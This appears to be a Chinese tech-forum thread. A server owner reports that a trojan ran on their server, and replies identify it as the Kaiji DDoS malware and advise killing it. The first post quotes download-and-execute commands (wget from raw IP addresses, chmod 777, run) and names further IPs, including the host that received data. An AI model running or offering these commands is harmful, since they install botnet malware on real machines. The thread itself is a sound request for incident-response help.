导航

服务器报警被恶意运行木马文件,郁闷

#1
大牛看下  危害大不?

http://47.242.231.229:8080/
http://192.227.146.252:2025/

运行以下两个命令
wget http://47.242.231.229:8080/Linux64 chmod 777 Linux64 ./Linux64
wget http://192.227.146.252:2025/B01C chmod 777 B01C ./B01C


定向110.42.103.18 5555 端口服务发送数据
这是啥论坛?
2024-04-17
#2
这种给777权限的,又不认识的IP,不要慌先给杀了再说,http://43.129.31.231:1024  这个IP也是和你这个差不多的
穷且益坚,不坠青云之志。
2024-04-18
#3
可以先杀了再看
2024-04-18
#4
样本  arsamd64 :Kaiji DDoS木马 。服务器弱口令?
2024-04-18
#5
会不会是挖矿啊?
2024-04-19
#6
服务上是跑了什么服务啊,给留了后门了?
2024-04-21
#7
X7论坛早没了, 人都进笆篱子了....
2024-04-22
#8
g咯1111111111111111111
2024-04-22
#9
这小7好多年前就进去了
2024-04-22
#10
这种权限太大了,先杀掉再备份看看具体的